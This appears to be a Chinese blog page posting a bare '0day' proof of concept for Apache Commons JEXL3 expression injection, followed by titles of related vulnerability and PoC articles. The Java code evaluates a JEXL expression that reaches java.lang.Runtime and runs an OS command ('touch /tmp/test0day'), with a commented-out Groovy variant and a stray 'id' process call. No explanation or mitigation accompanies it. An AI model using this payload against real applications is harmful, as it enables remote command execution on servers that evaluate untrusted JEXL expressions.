jxel3 0day poc

简介: import java.io.IOException; import java.util.
import java.io.IOException;
import java.util.List;


import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;


public class elExp {
public static void main(String args[]) throws IOException {
// Create or retrieve an engine
   JexlEngine jexl = new JexlBuilder().create();
   // Create an expression
   //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
   
   //String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
   String jexlExp = "1.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"touch /tmp/test0day\")";
   JexlExpression e = jexl.createExpression( jexlExp );
   try {
   
Process process = new ProcessBuilder("id").start();
} catch (IOException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
   // Create a context and add data
   JexlContext jc = new MapContext();
   jc.set("foo", jexlExp );
   
   // Now evaluate the expression, getting the result
   Object o = e.evaluate(jc);
   System.out.println(o);
   }
}
目录
相关文章
|
SQL 安全
初探POC编写
初探POC编写
352 0
初探POC编写
|
7月前
爆破、批量PoC扫描工具 -- POC-T
爆破、批量PoC扫描工具 -- POC-T
42 0
|
存储 安全 Java
内含POC丨S2-061(CVE-2020-17530)
本文仅是对S2-061进行复现,并且对复现的过程进行记录
|
XML 存储 安全
CVE-2022-30190 Follina Office RCE分析【附自定义word模板POC】
CVE-2022-30190 Follina Office RCE分析【附自定义word模板POC】
121 0
|
Kubernetes 安全 Ubuntu
【漏洞预警】Linux Kernel openvswitch 模块权限提升漏洞(CVE-2022-2639)POC复现及修复方法
【漏洞预警】Linux Kernel openvswitch 模块权限提升漏洞(CVE-2022-2639)POC复现及修复方法
417 0
【漏洞预警】Linux Kernel openvswitch 模块权限提升漏洞(CVE-2022-2639)POC复现及修复方法
|
安全 Linux
【紧急漏洞】Linux polkit本地权限提升漏洞(CVE-2021-4034)POC复现过程与修复方法
【紧急漏洞】Linux polkit本地权限提升漏洞(CVE-2021-4034)POC复现过程与修复方法
795 0
【紧急漏洞】Linux polkit本地权限提升漏洞(CVE-2021-4034)POC复现过程与修复方法
|
移动开发 安全 测试技术
APP漏洞渗透测试实施步骤
在开始APP渗透测试时,根据需要制定步骤,并向委托方详细说明需要使用的工具、方法等。具体操作时,会把渗透测试分成三个部分和阶段,不同的角度使区别的方法有所不同,例如在理论上把渗透测试分为准备阶段、渗透测试阶段、整体对比与评估阶段,而在技术操作上分为探测、攻击渗透、目标权限获取三个阶段。
277 0
APP漏洞渗透测试实施步骤
|
XML 安全 Java
网站apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
S2-057漏洞,于2018年8月22日被曝出,该Struts2 057漏洞存在远程执行系统的命令,尤其使用linux系统,apache环境,影响范围较大,危害性较高,如果被攻击者利用直接提权到服务器管理员权限,网站数据被篡改,数据库被盗取都会发生。
157 0
网站apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
|
安全 PHP Windows
phpstudy 漏洞分析与利用POC 包含漏洞补丁
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。
3643 0